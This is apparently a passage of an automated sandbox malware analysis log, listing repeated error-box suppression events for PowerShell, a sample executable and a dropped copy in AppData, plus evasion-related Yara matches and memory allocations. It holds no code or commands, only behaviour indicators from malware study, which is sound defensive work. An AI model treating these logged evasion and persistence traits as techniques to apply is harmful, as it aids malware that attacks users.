                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 8850000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 9850000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 9A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: AA60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: B450000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: C450000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: D450000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: 4BC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 1880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
